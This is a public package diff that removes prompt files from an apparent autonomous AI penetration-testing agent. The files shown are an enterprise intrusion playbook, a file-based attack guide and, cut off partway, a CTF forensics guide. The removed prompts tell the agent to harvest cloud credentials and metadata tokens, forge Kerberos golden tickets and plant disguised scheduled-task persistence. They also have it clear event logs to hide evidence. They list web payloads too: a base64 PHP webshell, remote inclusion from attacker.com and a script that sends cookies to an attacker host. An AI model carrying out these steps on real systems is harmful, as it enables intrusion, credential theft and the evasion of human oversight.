pentesting 0.73.13 → 0.90.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +120 -44
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-KHXXTHGS.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4UNNRHYY.js +0 -5797
- package/dist/chunk-GILD75OT.js +0 -11407
- package/dist/chunk-S5ZMXFHR.js +0 -1162
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9777
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-U2N3KWFH.js +0 -13
- package/dist/process-registry-4Y3HB4YQ.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
|
@@ -1,175 +0,0 @@
|
|
|
1
|
-
# Enterprise Pentest — Internal Network Autonomous Assessment
|
|
2
|
-
|
|
3
|
-
> **§3 Minimal Specification**: This is a **Bootstrap Reference**, not a prescribed order.
|
|
4
|
-
> Adapt based on `get_state`, attack graph observations, and live target behavior.
|
|
5
|
-
> **Cross-ref**: ad-attack.md (AD attacks), pivoting.md (lateral movement), zero-day.md (C4)
|
|
6
|
-
|
|
7
|
-
---
|
|
8
|
-
|
|
9
|
-
## Core Principle
|
|
10
|
-
|
|
11
|
-
```
|
|
12
|
-
Enterprise environments = layered defense + network segmentation + centralized AD + cloud integration
|
|
13
|
-
|
|
14
|
-
Priority:
|
|
15
|
-
1. Map internal network first → identify segments, DCs, critical services
|
|
16
|
-
2. Maximize lateral movement with captured credentials
|
|
17
|
-
3. AD domain → Forest compromise for full privilege escalation
|
|
18
|
-
4. Cloud (AWS/Azure/GCP) pivoting to complete hybrid environment takeover
|
|
19
|
-
```
|
|
20
|
-
|
|
21
|
-
---
|
|
22
|
-
|
|
23
|
-
## Phase 1: Internal Network Enumeration (Immediately after foothold)
|
|
24
|
-
|
|
25
|
-
```
|
|
26
|
-
SEGMENT DISCOVERY (run immediately after first shell):
|
|
27
|
-
├── ip a / ifconfig → network interfaces + IP ranges
|
|
28
|
-
├── ip route / netstat -rn → routing table → internal subnet list
|
|
29
|
-
├── arp -a → directly connected hosts
|
|
30
|
-
├── cat /etc/hosts → internal hostname mappings
|
|
31
|
-
└── cat /etc/resolv.conf → internal DNS server → domain enumeration base
|
|
32
|
-
|
|
33
|
-
ADJACENT SUBNET SCAN:
|
|
34
|
-
nmap -sn 10.x.x.0/24
|
|
35
|
-
for sub in $(seq 1 20); do nmap -sn 10.$sub.0.0/24; done
|
|
36
|
-
|
|
37
|
-
DNS ENUMERATION:
|
|
38
|
-
dig axfr @internal_dns domain.corp
|
|
39
|
-
dnsrecon -d corp.local -t axfr
|
|
40
|
-
for i in $(seq 1 254); do host 10.x.x.$i; done | grep "domain name pointer"
|
|
41
|
-
```
|
|
42
|
-
|
|
43
|
-
---
|
|
44
|
-
|
|
45
|
-
## Phase 2: Critical Internal Service Discovery
|
|
46
|
-
|
|
47
|
-
```
|
|
48
|
-
CRITICAL SERVICES TO FIND:
|
|
49
|
-
┌─────────────────────────────────────────────────────────────────────┐
|
|
50
|
-
│ Service Port Attack Vector │
|
|
51
|
-
├─────────────────────────────────────────────────────────────────────┤
|
|
52
|
-
│ Active Directory DC 88/389/636 Kerberos/LDAP/LDAPS │
|
|
53
|
-
│ SCCM/WSUS 8530/8531 Privilege escalation, malicious │
|
|
54
|
-
│ update delivery │
|
|
55
|
-
│ Exchange/Mail 25/443 Internal phishing, relay attacks │
|
|
56
|
-
│ Corporate CA (ADCS) 80/443 ESC1~13 ADCS vulnerabilities │
|
|
57
|
-
│ Jump Host/Bastion 22/3389 Lateral movement hub │
|
|
58
|
-
│ Database servers 1433/3306/5432 Credential reuse + data dump │
|
|
59
|
-
│ DevOps infra 8080/9000 Jenkins/SonarQube weak auth → │
|
|
60
|
-
│ code execution │
|
|
61
|
-
│ Cloud Metadata 169.254.169.254 IAM credential access │
|
|
62
|
-
└─────────────────────────────────────────────────────────────────────┘
|
|
63
|
-
|
|
64
|
-
SCCM ATTACKS (Enterprise-specific):
|
|
65
|
-
1. net group "SMS Admins" /domain → SCCM administrator list
|
|
66
|
-
2. Extract SCCM NAA (Network Access Account) credentials
|
|
67
|
-
3. Tools: SCCMHunter, SharpSCCM
|
|
68
|
-
web_search("SCCM attack lateral movement credential extraction {year}")
|
|
69
|
-
|
|
70
|
-
EXCHANGE ATTACKS:
|
|
71
|
-
1. ProxyShell/ProxyLogon: check CVE → run PoC
|
|
72
|
-
2. NTLM relay: responder + ntlmrelayx → capture Exchange auth
|
|
73
|
-
3. EWS (Exchange Web Services): ruler, EWSoauth
|
|
74
|
-
```
|
|
75
|
-
|
|
76
|
-
---
|
|
77
|
-
|
|
78
|
-
## Phase 3: AD Forest Attacks (after single domain compromise)
|
|
79
|
-
|
|
80
|
-
```
|
|
81
|
-
FOREST TRUST EXPLOITATION:
|
|
82
|
-
├── Discover trust relationships:
|
|
83
|
-
│ nltest /domain_trusts
|
|
84
|
-
│ PowerView: Get-DomainTrust
|
|
85
|
-
│
|
|
86
|
-
├── SID History attack (cross-forest movement):
|
|
87
|
-
│ - Current domain DA → target forest Enterprise Admin
|
|
88
|
-
│ - mimikatz lsadump::trust /patch → extract trust key
|
|
89
|
-
│ - kerberos::golden /user:Administrator /domain:corp.local
|
|
90
|
-
│ /sid:S-1-5-21-... /sids:S-1-5-21-TARGET-519 /rc4:TRUSTKEY
|
|
91
|
-
│
|
|
92
|
-
├── External Trust → Kerberoast across trust:
|
|
93
|
-
│ Get-DomainUser -Domain external.corp -SPN
|
|
94
|
-
│ Invoke-Kerberoast -Domain external.corp | Export-CSV
|
|
95
|
-
│
|
|
96
|
-
└── SID Filtering bypass:
|
|
97
|
-
web_search("SID filtering bypass forest trust attack {year}")
|
|
98
|
-
|
|
99
|
-
ENTERPRISE ADMIN PATHS:
|
|
100
|
-
1. Achieve DA in all domains → target Enterprise Admin directly
|
|
101
|
-
2. Schema Admin path → AD schema modification
|
|
102
|
-
3. Corp CA (ADCS) ESC6/ESC8 → Enterprise Admin certificate
|
|
103
|
-
```
|
|
104
|
-
|
|
105
|
-
---
|
|
106
|
-
|
|
107
|
-
## Phase 4: Cloud Pivoting (Hybrid environments)
|
|
108
|
-
|
|
109
|
-
```
|
|
110
|
-
ON-PREM → CLOUD PIVOT:
|
|
111
|
-
|
|
112
|
-
Credential sources:
|
|
113
|
-
env | grep -iE "aws|azure|gcp|secret|key|token"
|
|
114
|
-
find / -name "*.env" -o -name "credentials" -o -name "*.pem" -o -name "*.json" 2>/dev/null
|
|
115
|
-
cat ~/.aws/credentials ~/.azure/credentials ~/.config/gcloud/credentials.db
|
|
116
|
-
|
|
117
|
-
AWS ESCALATION:
|
|
118
|
-
aws sts get-caller-identity → current identity
|
|
119
|
-
aws iam list-attached-user-policies → current permissions
|
|
120
|
-
aws iam list-roles → assumable roles
|
|
121
|
-
aws sts assume-role --role-arn arn:... → privilege escalation
|
|
122
|
-
→ Goal: AdministratorAccess policy acquisition
|
|
123
|
-
web_search("AWS privilege escalation IAM misconfiguration {year}")
|
|
124
|
-
|
|
125
|
-
AZURE ESCALATION:
|
|
126
|
-
az login --use-device-code (or use stolen token)
|
|
127
|
-
az account list → accessible subscriptions
|
|
128
|
-
az vm list → VM inventory
|
|
129
|
-
az keyvault secret list --vault-name ... → dump secrets
|
|
130
|
-
Managed Identity → az role assignment list → check permissions
|
|
131
|
-
web_search("Azure privilege escalation managed identity {year}")
|
|
132
|
-
|
|
133
|
-
GCP ESCALATION:
|
|
134
|
-
gcloud auth list → authenticated accounts
|
|
135
|
-
gcloud projects list → accessible projects
|
|
136
|
-
gcloud iam service-accounts list → service account list
|
|
137
|
-
gcloud compute instances list → VM inventory
|
|
138
|
-
web_search("GCP privilege escalation service account {year}")
|
|
139
|
-
|
|
140
|
-
IMDS (Instance Metadata Service) attack:
|
|
141
|
-
AWS: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
|
142
|
-
Azure: curl -H "Metadata:true" http://169.254.169.254/metadata/identity/oauth2/token
|
|
143
|
-
GCP: curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
|
|
144
|
-
-H "Metadata-Flavor:Google"
|
|
145
|
-
```
|
|
146
|
-
|
|
147
|
-
---
|
|
148
|
-
|
|
149
|
-
## Phase 5: Long-term Persistence
|
|
150
|
-
|
|
151
|
-
```
|
|
152
|
-
ENTERPRISE PERSISTENCE (minimize detection risk):
|
|
153
|
-
├── Domain level: Golden Ticket (10-year validity) → exfiltrate krbtgt hash offline
|
|
154
|
-
├── Silver Ticket: service-specific TGS → permanent access to specific service
|
|
155
|
-
├── Scheduled task: schtasks /create /tn "WindowsUpdate" /tr ... /sc daily (disguised)
|
|
156
|
-
├── WMI persistence: wmic /namespace:\\root\subscription event handler
|
|
157
|
-
└── Cloud: backdoor IAM user / Lambda trigger / Lambda persistence
|
|
158
|
-
|
|
159
|
-
EVIDENCE CLEANUP (post-detection):
|
|
160
|
-
Windows: wevtutil cl System; wevtutil cl Security; wevtutil cl Application
|
|
161
|
-
Linux: echo -n > /var/log/auth.log; history -c; unset HISTFILE
|
|
162
|
-
Note: Log deletion itself is an IOC — minimal footprint is the guiding principle
|
|
163
|
-
```
|
|
164
|
-
|
|
165
|
-
---
|
|
166
|
-
|
|
167
|
-
## Search Patterns
|
|
168
|
-
|
|
169
|
-
```
|
|
170
|
-
web_search("enterprise pentest internal network lateral movement {year}")
|
|
171
|
-
web_search("SCCM attack chain privilege escalation credential extraction {year}")
|
|
172
|
-
web_search("AD forest trust attack SID filtering bypass Enterprise Admin {year}")
|
|
173
|
-
web_search("cloud AWS Azure GCP privilege escalation IAM misconfiguration {year}")
|
|
174
|
-
web_search("Exchange server ProxyShell ProxyLogon {version} exploit")
|
|
175
|
-
```
|
|
@@ -1,144 +0,0 @@
|
|
|
1
|
-
# File-Based Attacks — Comprehensive Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **Cross-ref**: injection.md (for injection via files), shells.md (web shells), evasion.md (filter bypass)
|
|
4
|
-
|
|
5
|
-
## Core Principle
|
|
6
|
-
Files are one of the most powerful attack vectors. There are dozens of file-based
|
|
7
|
-
attack techniques, each with hundreds of bypass variants. Search and adapt.
|
|
8
|
-
|
|
9
|
-
## File Attack Type Map
|
|
10
|
-
|
|
11
|
-
```
|
|
12
|
-
FILE-BASED ATTACK CATEGORIES:
|
|
13
|
-
│
|
|
14
|
-
├── 1. Local File Inclusion (LFI)
|
|
15
|
-
│ ├── Basic: ../../etc/passwd, ....//....//etc/passwd
|
|
16
|
-
│ ├── Null byte: ../../etc/passwd%00 (PHP < 5.3.4)
|
|
17
|
-
│ ├── Double encoding: %252e%252e%252f
|
|
18
|
-
│ ├── UTF-8 overlong: %c0%ae%c0%ae/
|
|
19
|
-
│ ├── Wrappers (PHP): php://filter, php://input, data://, expect://, zip://, phar://
|
|
20
|
-
│ │ ├── Read source: php://filter/read=convert.base64-encode/resource=config.php
|
|
21
|
-
│ │ ├── RCE: php://input + POST body with PHP code
|
|
22
|
-
│ │ ├── RCE: data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8+
|
|
23
|
-
│ │ ├── RCE: expect://id (if expect wrapper enabled)
|
|
24
|
-
│ │ └── RCE: phar://malicious.phar (deserialization via phar metadata)
|
|
25
|
-
│ ├── Windows: ..\..\windows\system32\drivers\etc\hosts
|
|
26
|
-
│ ├── Interesting files to read:
|
|
27
|
-
│ │ ├── Linux: /etc/passwd, /etc/shadow, /proc/self/environ, /proc/self/cmdline
|
|
28
|
-
│ │ ├── Web: /var/www/html/.env, wp-config.php, config.php, database.yml
|
|
29
|
-
│ │ ├── SSH: /home/*/.ssh/id_rsa, /root/.ssh/id_rsa
|
|
30
|
-
│ │ ├── Logs: /var/log/apache2/access.log (for log poisoning → RCE)
|
|
31
|
-
│ │ ├── Proc: /proc/self/fd/N (leaked file descriptors)
|
|
32
|
-
│ │ └── Windows: C:\Windows\win.ini, C:\boot.ini, web.config
|
|
33
|
-
│ └── LFI → RCE CHAINS:
|
|
34
|
-
│ ├── Log poisoning: inject PHP via User-Agent → include apache/nginx log
|
|
35
|
-
│ ├── /proc/self/environ: inject PHP via User-Agent/Referer header
|
|
36
|
-
│ ├── PHP session files: inject into session → include /tmp/sess_SESSIONID
|
|
37
|
-
│ ├── Temp files: race condition upload → include before cleanup
|
|
38
|
-
│ ├── Mail log: send email with PHP code → include /var/mail/www-data
|
|
39
|
-
│ └── web_search("LFI to RCE techniques {year}")
|
|
40
|
-
│
|
|
41
|
-
├── 2. Remote File Inclusion (RFI)
|
|
42
|
-
│ ├── Basic: ?page=http://attacker.com/shell.txt
|
|
43
|
-
│ ├── Requires: allow_url_include=On (PHP)
|
|
44
|
-
│ ├── Protocol: http://, https://, ftp://
|
|
45
|
-
│ ├── Null byte bypass: ?page=http://attacker.com/shell.txt%00
|
|
46
|
-
│ └── Often disabled — check and try, but LFI is more common
|
|
47
|
-
│
|
|
48
|
-
├── 3. Path Traversal (Directory Traversal)
|
|
49
|
-
│ ├── Basic: ../../../etc/passwd
|
|
50
|
-
│ ├── Encoded: %2e%2e%2f, %2e%2e/, ..%2f
|
|
51
|
-
│ ├── Double encoded: %252e%252e%252f
|
|
52
|
-
│ ├── Unicode: ..%c0%af, ..%ef%bc%8f
|
|
53
|
-
│ ├── Oversized: ....//, ....\/
|
|
54
|
-
│ ├── Absolute path: /etc/passwd (if app blindly prepends dir)
|
|
55
|
-
│ ├── Null byte: ../etc/passwd%00.png (bypass extension checks)
|
|
56
|
-
│ ├── In API parameters, cookies, headers, file names, ZIP entries
|
|
57
|
-
│ └── Use payload_mutate with context="path" for systematic variants
|
|
58
|
-
│
|
|
59
|
-
├── 4. File Upload Attacks
|
|
60
|
-
│ ├── BYPASS CATEGORIES (try ALL when blocked):
|
|
61
|
-
│ │ ├── Extension bypass:
|
|
62
|
-
│ │ │ ├── Double extension: shell.php.jpg, shell.jpg.php
|
|
63
|
-
│ │ │ ├── Alternative extensions: .php3, .php4, .php5, .phtml, .phar, .phps
|
|
64
|
-
│ │ │ ├── Case: .PHP, .Php, .pHp
|
|
65
|
-
│ │ │ ├── Special chars: shell.php%00.jpg, shell.php\x00.jpg, shell.php;.jpg
|
|
66
|
-
│ │ │ ├── Dot trailing: shell.php., shell.php..
|
|
67
|
-
│ │ │ ├── Space: shell.php (with trailing space)
|
|
68
|
-
│ │ │ └── web_search("file upload extension bypass {language}")
|
|
69
|
-
│ │ │
|
|
70
|
-
│ │ ├── Content-Type bypass:
|
|
71
|
-
│ │ │ ├── Change Content-Type to image/jpeg, image/png, image/gif
|
|
72
|
-
│ │ │ └── Keep malicious content, fake the content-type header
|
|
73
|
-
│ │ │
|
|
74
|
-
│ │ ├── Magic bytes bypass:
|
|
75
|
-
│ │ │ ├── GIF89a<?php system($_GET['cmd']); ?> (GIF header)
|
|
76
|
-
│ │ │ ├── \xFF\xD8\xFF\xE0 + PHP code (JPEG header)
|
|
77
|
-
│ │ │ ├── \x89PNG\r\n\x1a\n + PHP code (PNG header)
|
|
78
|
-
│ │ │ └── Prepend legitimate file header to malicious code
|
|
79
|
-
│ │ │
|
|
80
|
-
│ │ ├── Server processing bypass:
|
|
81
|
-
│ │ │ ├── .htaccess upload: AddType application/x-httpd-php .jpg
|
|
82
|
-
│ │ │ ├── web.config upload (IIS): handlers → execute aspx
|
|
83
|
-
│ │ │ ├── Polyglot files: valid image AND valid PHP/JSP/ASP
|
|
84
|
-
│ │ │ └── Filename manipulation: shell.php%20, shell.php::$DATA (Windows ADS)
|
|
85
|
-
│ │ │
|
|
86
|
-
│ │ └── Race condition:
|
|
87
|
-
│ │ ├── Upload → access before validation/deletion
|
|
88
|
-
│ │ ├── Write script for concurrent upload + access
|
|
89
|
-
│ │ └── web_search("file upload race condition exploit")
|
|
90
|
-
│ │
|
|
91
|
-
│ ├── POST-UPLOAD EXPLOITATION:
|
|
92
|
-
│ │ ├── Access uploaded shell: try common upload dirs
|
|
93
|
-
│ │ │ /uploads/, /images/, /media/, /files/, /tmp/, /static/
|
|
94
|
-
│ │ ├── If path unknown: LFI to find path, or fuzz the upload directory
|
|
95
|
-
│ │ └── Upgrade web shell to reverse shell (see shells.md)
|
|
96
|
-
│ │
|
|
97
|
-
│ └── SEARCH PATTERN:
|
|
98
|
-
│ web_search("file upload bypass techniques {year}")
|
|
99
|
-
│ web_search("{framework} file upload vulnerability")
|
|
100
|
-
│ web_search("file upload {defense} bypass")
|
|
101
|
-
│
|
|
102
|
-
├── 5. ZIP/Archive Attacks
|
|
103
|
-
│ ├── Zip Slip: path traversal in archive (../../../etc/cron.d/evil)
|
|
104
|
-
│ ├── ZIP symlink: include symlink to /etc/passwd → extracted by server
|
|
105
|
-
│ ├── ZIP bomb: denial of service (if relevant)
|
|
106
|
-
│ ├── Polyglot ZIP: valid ZIP + valid PHP
|
|
107
|
-
│ └── web_search("zip slip vulnerability exploitation")
|
|
108
|
-
│
|
|
109
|
-
├── 6. Symlink Attacks
|
|
110
|
-
│ ├── Create symlink to sensitive file → access through web
|
|
111
|
-
│ ├── Race condition: symlink swap between check and use (TOCTOU)
|
|
112
|
-
│ ├── Git symlink: include symlink in git repo → checkout reads target file
|
|
113
|
-
│ └── Relevant in: file upload, archive extraction, temp file operations
|
|
114
|
-
│
|
|
115
|
-
├── 7. Server-Side Processing Attacks
|
|
116
|
-
│ ├── ImageMagick (ImageTragick): web_search("imagemagick exploit CVE-2016-3714")
|
|
117
|
-
│ │ ├── SVG with embedded commands
|
|
118
|
-
│ │ ├── MVG file format exploitation
|
|
119
|
-
│ │ └── Ghostscript exploitation
|
|
120
|
-
│ ├── FFmpeg: SSRF via HLS playlist, local file read
|
|
121
|
-
│ ├── LibreOffice: macro execution, SSRF via document links
|
|
122
|
-
│ ├── PDF generators (wkhtmltopdf, dompdf): SSRF, XSS, local file read
|
|
123
|
-
│ │ ├── <iframe src="file:///etc/passwd">
|
|
124
|
-
│ │ ├── <script>document.location="http://attacker/?"+document.cookie</script>
|
|
125
|
-
│ │ └── web_search("{pdf_generator} SSRF local file read")
|
|
126
|
-
│ └── Document parsers: DOCX/XLSX (XXE via embedded XML), CSV injection
|
|
127
|
-
│
|
|
128
|
-
└── 8. SSRF via File Operations
|
|
129
|
-
├── URL parameter → file:///etc/passwd, gopher://, dict://
|
|
130
|
-
├── Cloud metadata: http://169.254.169.254/latest/meta-data/
|
|
131
|
-
├── Internal services: http://localhost:6379/ (Redis), http://localhost:9200/ (Elastic)
|
|
132
|
-
└── See web.md SSRF section for comprehensive SSRF methodology
|
|
133
|
-
```
|
|
134
|
-
|
|
135
|
-
## 🧠 File Attack Search Patterns
|
|
136
|
-
```
|
|
137
|
-
web_search("LFI to RCE {language} {framework} techniques")
|
|
138
|
-
web_search("file upload bypass {defense} {year}")
|
|
139
|
-
web_search("path traversal {application} CVE")
|
|
140
|
-
web_search("{file_type} polyglot {language}")
|
|
141
|
-
web_search("file inclusion wrapper {language}")
|
|
142
|
-
web_search("PayloadsAllTheThings file inclusion")
|
|
143
|
-
web_search("PayloadsAllTheThings upload")
|
|
144
|
-
```
|
|
@@ -1,313 +0,0 @@
|
|
|
1
|
-
# Forensics & Steganography — Comprehensive CTF Guide
|
|
2
|
-
|
|
3
|
-
> **Cross-ref**: file-attacks.md (file operations), pwn.md (binary analysis)
|
|
4
|
-
|
|
5
|
-
## Phase 0: File Analysis — Universal First Steps
|
|
6
|
-
|
|
7
|
-
```
|
|
8
|
-
With ANY unknown file:
|
|
9
|
-
├── file <file> → identify type (NEVER trust extension alone!)
|
|
10
|
-
├── strings <file> → extract readable strings
|
|
11
|
-
├── strings -el <file> → UTF-16 strings (Windows executables)
|
|
12
|
-
├── xxd <file> | head → hex dump first bytes (check magic bytes)
|
|
13
|
-
├── exiftool <file> → metadata (GPS, creator, timestamps, hidden fields)
|
|
14
|
-
├── binwalk <file> → embedded files/filesystems
|
|
15
|
-
│ └── binwalk -e <file> → extract embedded files
|
|
16
|
-
├── foremost <file> → file carving (alternative to binwalk)
|
|
17
|
-
└── entropy analysis:
|
|
18
|
-
binwalk -E <file> → high entropy = encrypted/compressed
|
|
19
|
-
|
|
20
|
-
Magic bytes quick reference:
|
|
21
|
-
├── 89 50 4E 47 → PNG
|
|
22
|
-
├── FF D8 FF → JPEG
|
|
23
|
-
├── 47 49 46 38 → GIF
|
|
24
|
-
├── 50 4B 03 04 → ZIP (also DOCX, XLSX, APK, JAR)
|
|
25
|
-
├── 1F 8B → GZIP
|
|
26
|
-
├── 42 5A 68 → BZIP2
|
|
27
|
-
├── 7F 45 4C 46 → ELF (Linux binary)
|
|
28
|
-
├── 4D 5A → PE (Windows executable)
|
|
29
|
-
├── 25 50 44 46 → PDF
|
|
30
|
-
├── D0 CF 11 E0 → MS Office (OLE2) — DOC, XLS, PPT
|
|
31
|
-
├── 52 49 46 46 → RIFF (WAV, AVI, WebP)
|
|
32
|
-
└── 00 00 00 18/20 → MP4 (ftyp)
|
|
33
|
-
|
|
34
|
-
File repair:
|
|
35
|
-
├── Corrupted header? → fix magic bytes manually with hex editor
|
|
36
|
-
├── PNG: pngcheck -v <file> → diagnose chunk errors
|
|
37
|
-
│ Fix CRC: python3 script to recalculate chunk CRC
|
|
38
|
-
│ Fix IHDR: width/height may be wrong → brute-force dimensions
|
|
39
|
-
├── ZIP: zip -FF corrupt.zip --out fixed.zip → repair archive
|
|
40
|
-
└── JPEG: truncated? → might still have flag in extractable data
|
|
41
|
-
```
|
|
42
|
-
|
|
43
|
-
## Steganography
|
|
44
|
-
|
|
45
|
-
```
|
|
46
|
-
═══════════════════════════════════════
|
|
47
|
-
Image Steganography:
|
|
48
|
-
═══════════════════════════════════════
|
|
49
|
-
|
|
50
|
-
JPEG:
|
|
51
|
-
├── steghide extract -sf <image.jpg> -p "" → try empty password first
|
|
52
|
-
├── steghide extract -sf <image.jpg> -p <pw> → with password
|
|
53
|
-
├── stegseek <image.jpg> rockyou.txt → brute force steghide password
|
|
54
|
-
├── stegcracker <image.jpg> rockyou.txt → alternative brute force
|
|
55
|
-
├── jsteg reveal <image.jpg> → jsteg extraction
|
|
56
|
-
└── outguess -r <image.jpg> output.txt → outguess extraction
|
|
57
|
-
|
|
58
|
-
PNG / BMP:
|
|
59
|
-
├── zsteg <image.png> → LSB analysis (multiple channels, orders)
|
|
60
|
-
├── zsteg -a <image.png> → try ALL extraction methods
|
|
61
|
-
├── pngcheck -v <image.png> → PNG structure validation
|
|
62
|
-
├── IDAT chunks: hidden data after IEND marker
|
|
63
|
-
│ python3 -c "data=open('img.png','rb').read(); print(data[data.index(b'IEND')+8:])"
|
|
64
|
-
├── LSB manual extraction:
|
|
65
|
-
│ from PIL import Image
|
|
66
|
-
│ img = Image.open('img.png')
|
|
67
|
-
│ bits = ''.join(str(px & 1) for px in img.getdata() for _ in [px] if isinstance(px, int))
|
|
68
|
-
│ # or for RGB: iterate R,G,B channels separately
|
|
69
|
-
└── Compare two similar images:
|
|
70
|
-
compare <img1> <img2> diff.png (ImageMagick)
|
|
71
|
-
→ pixel differences often reveal hidden data
|
|
72
|
-
|
|
73
|
-
GIF:
|
|
74
|
-
├── Multiple frames may hide data across frames
|
|
75
|
-
├── identify -verbose <file.gif> → frame count
|
|
76
|
-
├── convert <file.gif> frame_%d.png → extract all frames
|
|
77
|
-
└── Hidden frame with very short display time
|
|
78
|
-
|
|
79
|
-
General image:
|
|
80
|
-
├── StegSolve.jar → visual analysis (bit plane viewer, color channels)
|
|
81
|
-
├── CyberChef: Extract LSB
|
|
82
|
-
├── Compare file size to expected → hidden data appended
|
|
83
|
-
└── Check alpha channel (transparency) for hidden data
|
|
84
|
-
from PIL import Image
|
|
85
|
-
img = Image.open('img.png').split()[-1] # alpha channel
|
|
86
|
-
|
|
87
|
-
═══════════════════════════════════════
|
|
88
|
-
Audio Steganography:
|
|
89
|
-
═══════════════════════════════════════
|
|
90
|
-
├── Audacity → spectrogram view (Analyze → Plot Spectrum or View → Spectrogram)
|
|
91
|
-
│ Hidden images/text visible in frequency domain
|
|
92
|
-
├── sonic-visualiser → detailed spectrogram layers
|
|
93
|
-
├── DTMF decoder → phone dial tones (multimon-ng)
|
|
94
|
-
├── morse-decoder → morse code in audio
|
|
95
|
-
├── wav hidden data:
|
|
96
|
-
│ python3 → read raw samples → LSB extraction
|
|
97
|
-
│ stegolsb wavsteg -r -i audio.wav -o output.txt
|
|
98
|
-
├── SSTV (Slow-Scan Television):
|
|
99
|
-
│ qsstv or RX-SSTV → decode image from audio signal
|
|
100
|
-
│ Common in space/radio-themed CTFs
|
|
101
|
-
└── mp3stego → MP3-specific steganography
|
|
102
|
-
|
|
103
|
-
═══════════════════════════════════════
|
|
104
|
-
Text / Document Steganography:
|
|
105
|
-
═══════════════════════════════════════
|
|
106
|
-
├── Whitespace stego: stegsnow -C <file>
|
|
107
|
-
│ Tabs and spaces encode binary data at end of lines
|
|
108
|
-
├── Zero-width characters: Unicode U+200B, U+200C, U+200D, U+FEFF
|
|
109
|
-
│ cat -v <file> | grep -o '\xE2\x80[\x8B-\x8F]' → detect
|
|
110
|
-
├── Homoglyph attacks: visually identical but different Unicode chars
|
|
111
|
-
│ 'а' (Cyrillic) vs 'a' (Latin) → different bytes
|
|
112
|
-
├── Line-ending manipulation: CRLF vs LF patterns encode bits
|
|
113
|
-
├── PDF steganography:
|
|
114
|
-
│ ├── pdf-parser.py <file.pdf> → analyze objects
|
|
115
|
-
│ ├── Hidden JavaScript: /JavaScript, /JS keys
|
|
116
|
-
│ ├── Embedded files in PDF streams
|
|
117
|
-
│ ├── Invisible text (white on white)
|
|
118
|
-
│ └── pdftotext <file.pdf> → extract all text
|
|
119
|
-
└── Office documents (DOCX/XLSX):
|
|
120
|
-
├── unzip <file.docx> → extract XML contents
|
|
121
|
-
├── Hidden text (white font, tiny size)
|
|
122
|
-
├── Document properties / custom metadata
|
|
123
|
-
└── Embedded OLE objects / macros
|
|
124
|
-
```
|
|
125
|
-
|
|
126
|
-
## Network Forensics (PCAP)
|
|
127
|
-
|
|
128
|
-
```
|
|
129
|
-
═══════════════════════════════════════
|
|
130
|
-
Wireshark / tshark analysis:
|
|
131
|
-
═══════════════════════════════════════
|
|
132
|
-
├── tshark -r file.pcap -T fields -e data → raw data extraction
|
|
133
|
-
├── tshark -r file.pcap -Y "http" -T fields -e http.request.uri
|
|
134
|
-
├── tshark -r file.pcap -Y "ftp" -T fields -e ftp.request.arg
|
|
135
|
-
├── Follow TCP stream: tcp.stream eq <N>
|
|
136
|
-
├── Export HTTP objects: File → Export Objects → HTTP
|
|
137
|
-
└── Statistics → Protocol Hierarchy → see what protocols are used
|
|
138
|
-
|
|
139
|
-
═══════════════════════════════════════
|
|
140
|
-
Common PCAP patterns in CTF:
|
|
141
|
-
═══════════════════════════════════════
|
|
142
|
-
├── HTTP: credentials in POST, file downloads, flag in response
|
|
143
|
-
├── FTP: RETR/STOR commands → extract transferred files
|
|
144
|
-
